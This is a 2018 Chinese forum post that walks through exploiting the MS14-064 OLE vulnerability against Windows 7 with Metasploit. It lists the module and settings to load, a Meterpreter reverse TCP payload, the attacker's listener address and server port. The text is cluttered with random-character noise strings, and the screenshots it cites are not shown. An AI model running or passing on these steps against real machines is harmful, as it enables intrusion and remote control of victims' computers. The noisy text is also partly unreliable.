找回密码
 立即注册
查看: 2052|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# O( A5 w* N0 Y* V$ Y8 R2 ] 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 6 h+ ]4 H) s$ z0 z+ ?. r

6 b5 n0 `, V$ @" {- a% Z

: J: f* ~8 r/ D 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: : v* S% v7 I: X" I. L

& l, H* I8 h7 N( p8 ?1 I* g% K( ~

4 A7 w9 h& }3 E# \ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp6 y: n3 _! h& ^+ e$ O6 j g+ R

6 F) Y+ ^ J/ a4 p: z

- u( o$ `5 F# n% Z3 x             set AllowPowershellPrompt true+ e' R# I# @3 `+ M/ L

W I& c- M4 \: M* T* z5 Q) R1 |

5 i; u$ l: J% I2 b3 ~+ b W) U* h             Set LHOST 192.168.0.109 + m1 r* m N( Q( p3 \8 C1 n7 m

! u% g) i( W0 K8 T& c$ J

! I! {3 j: N0 P- h# ^" M4 Z             set SRVHOST 192.168.0.109 6 J; `- e6 G1 D) s2 u% F% }7 {

. _2 n) ]$ s( J. d% T7 m

9 _# M, s" J# r5 ?             Set uripath share 1 O" i1 P1 B# J

! l0 }2 P! D1 ~/ s# M" ~$ a0 o

* N/ i3 f* L. w1 b             Set srvport 80- J. [+ q$ v7 c' f( y: A( y

) d. C% x& y8 |! t$ x/ Z, y

1 k- w3 p# f& Q" O4 g' U8 Q  ) A: t5 Y' }' v3 N

7 u0 [; K. I; j' F9 \' {3 g

* |- l/ \5 \7 c: T  1 N/ z- h- g' S) W9 I* \

% c; y3 D7 h: U/ H. n) s

* l3 Q% J: Y+ x7 j7 `' x  ; p3 U+ N. a1 z$ b1 e

. r, u7 n4 G3 \8 [8 q1 Y2 d

6 u' b7 C- B/ M* U  , C; _! K5 ~$ C

1 W) v! N8 J3 u2 D

" X) M) G0 \: [+ H  3 [& _. f+ Z* B5 J. Z. L

5 C) t& p n2 L0 D" k+ \

9 y& G+ S) Y! f5 w! [ 下面我们来访问本地地址如图: . x* Q% V5 Z. ?) G8 \

" y3 R& O' n( U( z/ q/ T0 A2 n. a9 \

" W$ [" t8 A$ w' A, c" Y/ n   0 n0 K# o0 x7 B; q

. d" ^( l' @5 r0 ~- k

0 H! W+ z& o7 P. H2 j5 b& P  2 h5 D2 O( a& U5 J1 X+ w. x

+ A4 q8 j7 b( ?8 ~/ a7 s

8 R) W% C. s9 W. e' }$ ?8 F % p U7 e5 R/ R9 o5 w

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表